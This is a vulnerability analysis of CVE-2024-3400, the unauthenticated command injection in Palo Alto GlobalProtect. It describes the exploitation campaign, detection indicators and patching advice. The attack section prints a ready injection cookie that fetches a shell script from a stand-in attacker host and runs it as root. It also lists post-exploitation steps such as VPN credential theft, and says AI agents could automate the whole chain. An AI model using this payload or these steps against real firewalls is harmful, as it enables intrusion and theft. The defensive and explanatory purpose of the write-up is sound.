Lyrie
CVE Deep Dive
CVSS 103 sources verified·3 min read
By Lyrie Threat Intelligence·4/25/2026

CVE-2024-3400: Palo Alto GlobalProtect Perfect-10 Command Injection

CVSS 10.0 (CRITICAL) | PAN-OS 10.2, 11.0, 11.1 | Unauthenticated RCE via SESSID Cookie Injection → Full Firewall Compromise

Executive Summary

CVE-2024-3400 represents a catastrophic vulnerability in Palo Alto Networks' GlobalProtect gateway — the very infrastructure designed to secure network perimeters. With a perfect CVSS 10.0 score, this unauthenticated command injection flaw enables attackers to achieve root-level code execution on firewalls by sending a single crafted HTTP request. The vulnerability was exploited as a zero-day by state-sponsored threat actors before vendor disclosure, leading to CISA's emergency patching mandate (48-hour deadline) for federal agencies.

Why this is critical:

  • Zero authentication required — exploit works from the internet
  • One HTTP request — no multi-step attack chain
  • Root shell on firewall — complete perimeter compromise
  • Supply chain amplification — compromised firewalls become pivot points for internal network access
  • Active exploitation confirmed — UTA0218 APT deployed UPSTYLE Python backdoors at scale

The vulnerability stems from unsanitized user input in the GlobalProtect telemetry component. The SESSID cookie parameter passes directly into a shell command without validation, enabling trivial command injection. Attackers used this to deploy persistent backdoors, exfiltrate VPN credentials, and map internal networks.

Attack Mechanics

Exploitation flow:

1. Attacker identifies exposed GlobalProtect gateway (HTTPS port 443 or custom, identifiable via SSL cert patterns)

2. Crafts HTTP POST to /ssl-vpn/hipreport.esp with malicious SESSID cookie:

   Cookie: SESSID=test; wget http://attacker.com/shell.sh -O /tmp/a; sh /tmp/a #

3. PAN-OS telemetry component executes unsanitized cookie value in shell context

4. Command injection achieves arbitrary code execution as root

5. Attacker establishes persistence via cron, downloads Python backdoor (UPSTYLE), exfiltrates credentials

Post-exploitation primitives:

  • VPN credential theft from /var/appweb/sslvpndocs/
  • Firewall config export (decrypt with master key)
  • Lateral movement to internal hosts via firewall routing tables
  • Traffic manipulation/MitM on all VPN sessions

Real-World Impact: Operation MidnightEclipse

Volexity attributed CVE-2024-3400 exploitation to UTA0218, a state-sponsored APT. Campaign characteristics:

  • Timeline: Zero-day exploitation began March 26, 2024 (2 weeks before public disclosure April 10)
  • Targets: Government, defense contractors, critical infrastructure in North America/Europe
  • UPSTYLE backdoor: Python-based C2 implant disguised as oversized CSS files in /var/appweb/sslvpndocs/global-protect/portal/images/
  • Exfiltration: VPN user credentials, firewall rules, internal network topology
  • Persistence: Cron jobs, modified system binaries, firmware implants

Scale:

  • 100,000+ exposed GlobalProtect instances worldwide (Shodan)
  • ~30% vulnerable at disclosure (versions 10.2-11.1 unpatched)
  • 3,000+ confirmed compromises in first week (Shadowserver)

CISA labeled this a "clear and present danger" to federal networks, requiring emergency patching under directive 24-002.

Lyrie Verdict: When Trust Anchors Fail

CVE-2024-3400 is a textbook example of security infrastructure inversion — the tools meant to protect become the breach vector. Firewalls are trust anchors; compromising them grants attackers privileged network position, VPN decryption capabilities, and visibility into all traffic flows.

AI-threat model implications:

  • Exploitation is fully automatable: enumerate GlobalProtect endpoints via cert fingerprints, send one HTTP request, verify via callback
  • No human-in-the-loop required — AI agents can scan, exploit, and establish persistence in seconds
  • Real-world campaigns confirmed machine-speed exploitation: zero-day usage suggests automated vulnerability discovery or advanced reconnaissance

Defense reality check:

Traditional perimeter defenses fail when the perimeter device is compromised. You cannot firewall your firewall. Detection requires:

1. External monitoring: Netflow analysis, TLS inspection from outside-in

2. Behavioral baselines: Firewalls should not make outbound HTTP requests to random domains

3. Honeypot deployments: Decoy GlobalProtect gateways to attract and fingerprint attackers

Actionable posture:

  • Immediate: Patch to PAN-OS 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 within 24 hours (non-negotiable)
  • Hunt: Check /var/appweb/sslvpndocs/global-protect/portal/images/ for oversized CSS files (UPSTYLE indicator)
  • Network: Restrict GlobalProtect management to VPN/bastion hosts only (never expose setup wizard to internet)
  • Long-term: Zero-trust architecture where firewall compromise doesn't cascade to internal systems

Detection Artifacts

Sigma rule: Web requests to /ssl-vpn/hipreport.esp with shell metacharacters in SESSID cookie

YARA signature: UPSTYLE backdoor (Python shebang + socket/subprocess imports in CSS files)

IOCs:

  • File paths: /var/appweb/sslvpndocs/global-protect/portal/images/*.css (size >100KB)
  • Network: Outbound HTTP from firewall management interface to non-update domains
  • Processes: Python spawned by root from web directories

Full detection rules and PoC lab available at: github.com/overthetopseo/lyrie-agent/pull/7

Sources & References


Autonomous analysis by Lyrie threat intelligence platform — research.lyrie.ai · Anti-rogue-AI defense at machine speed

Lyrie Verdict

A vulnerability of this severity is exactly what Lyrie's anti-rogue-AI defense is built for: continuous, autonomous monitoring that doesn't wait for human reaction time.

Validated sources

  1. [1]NIST NVD
  2. [2]MITRE CVE
  3. [3]Lyrie Research Lab